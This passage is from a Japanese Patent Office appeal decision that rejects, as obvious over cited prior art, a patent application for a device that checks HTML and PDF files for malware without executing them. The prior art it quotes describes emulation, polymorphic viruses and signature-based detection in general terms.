本発明は,マルウェアに対して計算装置を保護するためのセキュリティモデルを提供する。本発明の1つの実施の形態によると,計算装置に関連した潜在的なマルウェアを安全プログラムコードに翻訳する方法が提供される。本発明のこの実施の形態は,潜在的なマルウェアをメモリ中の識別されたプログラムエントリイで解析することで開始する。潜在的なマルウェアの初期の解析は,プログラムコードを「基本ブロック」に,基本ブロック中の最後の命令に出会うまで命令を復号するにより分割することから成る。基本ブロック中の命令が前にスキャンされていない場合,スキャナーがマルウェアの基本ブロックを探索する。もし,マルウェアが検出されて,そして十分なレベルの正確さでもってマルウェアの識別ができた場合,マルウェアを含んだファイルは感染していると報告される。この場合,本発明によるさらなる解析は必要としない。・・・(後略)・・・」

N.「【0015】
図2に示されるように,マルウェア検出システム200は,CPU202を含む。当業者には理解されるようにCPU202は,ネイティブプログラムコードの実行をサポートすることによりマルウェア検出システム200の計算センターとしての役割を果たす。隠れたマルウェアを検出するために使用される1つの従来技術は,仮想CPUを含む仮想オペレーティング環境内でプログラム実行を「エミュレート」することである。エミュレーション中,行動シグネチャが仮想オペレーティング環境内でのプログラムの観測されたイベントに基づいて生成される。行動シグネチャは,エミュレートされたプログラムがマルウェアであるかどうかを決定するための解析に適している。システムのこのタイプにおいては,プログラム中の各命令は仮想CPU上でエミュレートされる。この結果,エミュレーションは多くの時間を要し,本発明により提供されるマルウェア検出インフラストラクチャと比較して顕著な性能の低下を発生する。例えば,ループ内のプログラム命令は,プログラム命令の効果が前の反復で観測されても,各反復についてループを介して仮想CPU上でエミュレートされる。さらに,プログラムが多大な計算オーバーヘッドを消費するソフトウェアで実現された仮想CPU上でエミュレートされる。これに対して,本発明は実際の又はハードウェアに基づいたCPU202上でプログラムコードを実行する。マルウェアが実行されないことを保証するために,潜在的なマルウェア中のプログラムコードは実行前に安全なプログラムコードに翻訳される。
【0016】
図2に示すように,マルウェア検出システム200は,マルウェアを検出するように設計されたスキャナー204を含む。当業者には知られているように,多くの異なるソフトウェアベンダーがマルウェアのプログラムコード特性を識別するために構成されたアンチビールスソフトウェア中にスキャナーを含めている。困ったことには,既存のスキャナーは,実行する前に潜在的なマルウェアを安全なプログラムコードに翻訳するシステムと一緒に動作するようには構成されていない。その代わり,いくつかの既存のスキャナーは上述したタイプのエミュレーションシステムと一緒に動作する。これらのシステムにおいては,スキャナーは追加のオーバーヘッドを課し,エミュレーション方法は不合理な時間を費やすであろう。しかし,本発明により実現されるソフトウェアルーチンは,スキャナー204に「アンパックされた」(すなわち,復号された)又は実行時にメモリ内にロードされた隠れたマルウェアを素早く識別するのに必要なインフラストラクチャを提供する。」

エ.参考文献4に記載されている技術的事項
本願出願前に頒布された特開2007-80281号公報(平成19年3月29日出願公開,以下,「参考文献4」という。)には,関連する図面とともに,以下の技術的事項が記載されている。(当審注:下線は,参考のために当審で付与したものである。)

P.「【0006】
ウィルス作者は,先在するウィルス内に変異型を生産し始めた。実行可能命令コードを単に並び替えるだけで,異なるシグネチャがウィルスの変異形態に生産される。こうした新しいシグネチャは,周知シグネチャのデータベースと比較した場合に,ウィルス・スキャナでは認識できない。
【0007】
本質的には,暗号化されたウィルスは,ウィルス暗号化解除ルーチンと暗号化されたウィルス本体から成る。ユーザが感染したプログラムを起動すると,ウィルス暗号化解除ルーチンは,最初にコンピュータの制御を得て,次にウィルス本体を暗号化解除する。次いで,暗号化解除ルーチンは,コンピュータの制御を暗号化解除ウィルスに転送する。
【0008】
暗号化ウィルスは,どのような単純なウィルスでも行うように,プログラム及びファイルを感染させる。ウィルスが新しいプログラムを感染させるたびに,このウィルスは,暗号化解除されたウィルス本体及び関連する暗号化解除ルーチンの両方のコピーを生成し,このコピーを暗号化して,この両方を目標に添付する。ウィルス本体のコピーを暗号化するために,暗号化されたウィルスは,ウィルスが感染毎に変化するようにプログラムされた暗号キーを用いる。このキーが変化するので,ウィルス本体の並び替えにより,ウィルスは感染毎に異なって見えるようになる。
【0009】
命令の並び替えは,機能的に等価な命令において発生し得る。プログラム内の命令が5+2の足し算をする場合,これは,2+5の足し算をする変異プログラム・コードと機能的に同じである。しかしながら,プログラム・コード及び変異型は,異なるシグネチャを生産するであろう。このことは,ウィルス対策ソフトウェアが,一致したウィルス本体から抽出されたウィルスシグネチャを検索することを非常に困難にする。」

Q.「【0011】
実行可能コードのためのシグネチャを生成する方法。実行可能コードのためのエントリ・アドレスを求める。エントリ・アドレスから開始して,この方法は実行可能コードをステップスルーし,第1の種類の命令を廃棄する。更に,少なくとも1つの種類の分岐命令を廃棄して次に進行する。終了条件に達するまで,ニーモニック・コード・リストが,廃棄されなかった命令をニーモニック形式で発行することにより生成される。ニーモニック・コード・リストは,実行可能コードと関連付けられたシグネチャを生成するように処理される。最後に,シグネチャが分析されて,実行可能コードを一組の所定のカテゴリの1つに分類する。
・・・(中略)・・・
【0016】
本実施形態が目的とする利点は,実行可能コードにおいて,種々の変異型アーチファクトがないシグネチャソースを抽出することである。本実施形態が目的とする別の利点は,実行可能コードの変異形態内で一致したシグネチャを計算することである。」

(4)対比

ア.本件補正発明と引用発明とを対比する。

(ア)引用発明の「HTMLファイル」に含まれる「スクリプト」が,マルウェア検査対象の「pdfファイル」をダウンロードするものといえるから,引用発明の「HTMLファイル」,「スクリプト」及び「pdfファイル」は,それぞれ本件補正発明の「第1のデータファイル」,「プログラムコード」及び「第2のデータファイル」に相当する。
引用発明の「システム」は,システムが情報処理装置で構成されることは技術常識からみて明らかであるから,本件補正発明の「情報処理装置」に対応する。

(イ)上記(ア)の検討から,引用発明の「HTMLファイル」は本件補正発明の「第1のデータファイル」に相当し,データを読み込むことでデータを取得できることは技術常識であるから,
引用発明の「HTMLファイルを読み込」むことは,本件補正発明の“データファイルを取得”することに相当する。

(ウ)引用発明の「前記HTMLファイルに対して,スクリプトの抽出・動的解析を行い,前記スクリプトが外部スクリプトファイルを読み込んでいるか否かを判断」することと,
本件補正発明の「取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査」すること,及び「前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査」することを対比すると,

「HTMLファイル」に対して内部のスクリプトが外部スクリプトファイルを読み込んでいるか否かを判断することは,
取得された「HTMLファイル」に外部スクリプトファイルを取得する「スクリプト」が含まれているか否かを検査していることに他ならないから,

両者は,後記する点で相違するものの,
“取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査”する点で共通しているといえる。

(エ)引用発明の「HTMLファイル内のスクリプトによりpdfファイルがダウンロードされる場合,前記pdfファイルに対して,スクリプトの抽出・動的解析により難読化を解除し,難読化を解除したコード内の,既知の脆弱性のあるコードの有無で,マルウェアであるか否かを判断」することと,
本件補正発明の「前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査」すること,及び「前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査」することを対比すると,

引用発明の「HTMLファイル内のスクリプトによりpdfファイルがダウンロードされる場合」は,
HTMLファイル(第1のデータファイル)内に,pdfファイル(第2のデータファイル)をダウンロードするスクリプト(プログラムコード)が含まれる場合といえるから,
本件補正発明の「前記第1のデータファイルに前記プログラムコードが含まれていた場合」に相当する。

また,引用発明の「前記pdfファイルに対して,スクリプトの抽出・動的解析により難読化を解除し,難読化を解除したコード内の,既知の脆弱性のあるコードの有無で,マルウェアであるか否かを判断」することは,
pdfファイル(第2のデータファイル)を検査することといえる。

したがって,両者は,後記する点で相違するものの,
“前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査”する点で共通しているといえる。

イ.以上から,本件補正発明と引用発明とは,以下の点で一致し,また,以下の点で相違する。

(一致点)
「データファイルを取得し,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査し,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する,
情報処理装置。」

(相違点1)
本件補正発明は「第1のデータファイル」を「実行することなく」検査し,「前記第2のデータファイル」を「実行することなく静的な情報に基づいて」検査しているのに対して,
引用発明は,検査に動的解析を用いている点。

(相違点2)
本件補正発明は,「取得」処理,第1のデータファイルの「検査」処理,第2のデータファイルの「検査」処理の各処理を行う「ファイル取得手段」,「第1のファイル検査手段」,「第2のファイル検査手段」を備えることが特定されているのに対し,
引用発明は,「ファイル取得手段」,「第1のファイル検査手段」,「第2のファイル検査手段」を別個の手段として備えることが特定されていない点。

(5)当審の判断

上記相違点1及び2について検討する。

ア.相違点1について

引用発明では,データファイルに対して,動的解析を行っているところ,
引用文献の上記Aの「この難読化された不正なpdfファイルを解析するためには,pdfファイルから圧縮されたJavaScriptコードを抽出し,難読化を解除する必要がある。これらのインシデントを詳細に把握するためには,一般的に図1に示す手順もしくは逆に被害から解析を進めていく必要があり,大変困難な作業となる。」との記載,上記Bの「図1 一般的なインシデント解析手順と開発システムの対応範囲」との記載からすると,従来は,一般的な解析手順として,難読化されていないHTMLファイルやPDFファイルを動的解析でない,すなわち,静的な手法を用いて解析していたと解するのが妥当である。

一方,検査対象となるデータファイルを実行する前,すなわち,実行することなく,データファイルを検査するための具体的方法は,例えば参考文献1(上記F?Hを参照),参考文献2(上記Jを参照),参考文献3(上記K?Nを参照),参考文献4(上記P,Qを参照)に記載されるように,本願の出願前には,情報セキュリティの技術分野において普通に採用されていた周知技術であり,このような場合,データファイルを実行せずに検査するのであるから,挙動パターンのような動的な情報は生成されておらず,該検査には,メタデータやデータのパターン,復号化ルーチンのパターンのような静的な情報しか用いることができないことは明らかである。

また,解析対象の実行前に検査を行う静的解析と,解析対象の実行後に検査を行う動的解析の両方を行うことも,例えば,参考文献2(上記Iを参照)に記載されているように,情報セキュリティの技術分野において普通に採用されていた周知技術である。そして,難読化されたマルウェアが出現しても,従来の難読化されていないマルウェアが依然として存在することは技術常識であり,検査対象のデータファイルが,難読化されたマルウェアを含むのか,難読化されていないマルウェアを含むのかを検査前に知ることはできないのであるから,動的解析を行う引用発明において,難読化されていないマルウェアの静的解析も行うようにするか否かは,当業者が必要に応じて選択し得た事項であり,静的解析も行うことの阻害要因も認められない。

さらに,難読化されたマルウェアを実行前に検出する方法も,参考文献3(上記K?Nを参照),参考文献4(上記P,Qを参照)に記載されるように,本願の出願前には,情報セキュリティの技術分野において普通に採用されていた周知技術であった。

してみると,引用発明において,上記周知技術を適用して,検査を静的に,すなわち,実行することなく静的な情報に基づいて行うように構成すること,すなわち,上記相違点1に係る構成とすることは,当業者が容易に想到し得たことである。

イ.相違点2について

一連の情報処理を実現する際に,そのための所定の纏まりをもった機能実現手段の組合わせによって実現することは,情報処理分野における常とう手法であるから,引用発明における「取得」処理,第1のデータファイルの「検査」処理,第2のデータファイルの「検査」処理の各処理の機能実現手段として「ファイル取得手段」,「第1のファイル検査手段」,「第2のファイル検査手段」を備えること,すなわち上記相違点2に係る構成とすることは,当業者が容易に想到し得たことである。

ウ.小括

上記で検討したごとく,相違点1及び相違点2に係る構成は当業者が容易に想到し得たものであり,そして,これらの相違点を総合的に勘案しても,本件補正発明の奏する作用効果は,上記引用発明及び当該技術分野の周知技術の奏する作用効果から予測される範囲内のものにすぎず,格別顕著なものということはできない。

したがって,本件補正発明は,上記引用発明及び当該技術分野の周知技術に基づいて,当業者が容易に発明をすることができたものであり,特許法第29条第2項の規定により,特許出願の際独立して特許を受けることができない。

エ.付記

なお,請求人は,平成27年8月20日付け上申書において「しかしながら,文献1に記載されたシステムは,記憶装置に保存されたHTMLファイルおよびPDFファイルを対象として不正コードの検査を行っています。
一方,本願発明は,出願当初明細書の段落【0023】にも記載している通り,ネットワーク・トラフィックをキャプチャして解析し,不正コードの検査を行います。したがって,文献1に,不正コードを検査する手法として静的な情報に基づいて検査する周知技術を適用したとしても,本願発明とは異なる構成となるものと考えます。」と主張している。
しかしながら,本件補正発明(補正後の請求項1に記載された発明)は, 「データファイル」を検査する「情報処理装置」であって,ネットワーク・トラフィックをキャプチャする点は特定されていない。
したがって,請求人の主張は,補正後の請求項1の記載に基づくものではなく失当である。

4.むすび

以上のように,本件補正は,上記「3.独立特許要件」で指摘したとおり,補正後の請求項1に記載された発明が,特許出願の際独立して特許を受けることができるものではないから,特許法第17条の2第6項において準用する同法第126条第7項の規定に違反するので,同法第159条第1項において読み替えて準用する同法第53条第1項の規定により却下すべきものである。

よって,上記補正却下の決定の結論のとおり決定する。

第3 本願発明について

1.本願発明の認定

平成27年2月27日付けの手続補正は上記のとおり却下されたので,補正後の請求項1に対応する補正前の請求項に係る発明(以下,「本願発明」という。)は,平成26年9月18日付けの手続補正により補正された特許請求の範囲の請求項1に記載された事項により特定される,以下のとおりのものである。


「データファイルを取得するファイル取得手段と,
取得された第1のデータファイルに他の第2のデータファイルを取得するためのプログラムコードが含まれているか否かを検査する第1のファイル検査手段と,
前記第1のデータファイルに前記プログラムコードが含まれていた場合に,当該プログラムコードに基づいて取得される前記第2のデータファイルを検査する第2のファイル検査手段と,
を備え,
前記第1のファイル検査手段は,前記第1のデータファイルを実行することなく当該第1のデータファイルに前記プログラムコードが含まれているか否かを検査し,
前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく当該第2のデータファイルを検査する,情報処理装置。」

2.引用文献に記載されている技術的事項及び引用発明の認定

原査定の拒絶の理由に引用された,引用発明は,前記「第2 平成27年2月27日付けの手続補正についての補正却下の決定」の「3.独立特許要件」の「(2)引用文献」に記載したとおりである。

3.対比・判断

本願発明は,前記「第2 平成27年2月27日付けの手続補正についての補正却下の決定」の「3.独立特許要件」で検討した本件補正発明の「前記第2のファイル検査手段は,前記第2のデータファイルを実行することなく静的な情報に基づいて当該第2のデータファイルを検査する」事項から,「静的な情報に基づいて」検査する点を削除したものである。

そうすると,本願発明の発明特定事項を全て含む本件補正発明が,前記「第2 平成27年2月27日付けの手続補正についての補正却下の決定」の「3.独立特許要件」の「(2)引用文献」?「(5)当審の判断」に記載したとおり,引用発明及び当該技術分野の周知技術に基づいて当業者が容易に発明をすることができたものであるから,上記特定の限定を省いた本願発明も同様の理由により,引用発明及び当該技術分野の周知技術に基づいて,当業者が容易に発明をすることができたものである。

4.むすび

以上のとおり,本願の請求項1に係る発明は,特許法第29条第2項の規定により特許を受けることができないものであるから,その余の請求項に係る発明について検討するまでもなく,本願は拒絶すべきものである。

よって,結論のとおり審決する。
 
審理終結日 2015-10-27 
結審通知日 2015-11-04 
審決日 2015-12-03 
出願番号 特願2011-8926(P2011-8926)
審決分類 P 1 8・ 575- Z (G06F)
P 1 8・ 121- Z (G06F)
最終処分 不成立  
前審関与審査官 脇岡 剛石田 信行  
特許庁審判長 辻本 泰隆
特許庁審判官 戸島 弘詩
高木 進
発明の名称 情報処理装置、システム、通信監視方法およびプログラム  
代理人 古部 次郎  
代理人 久保 洋之  

プライバシーポリシー   セキュリティーポリシー   運営会社概要   サービスに関しての問い合わせ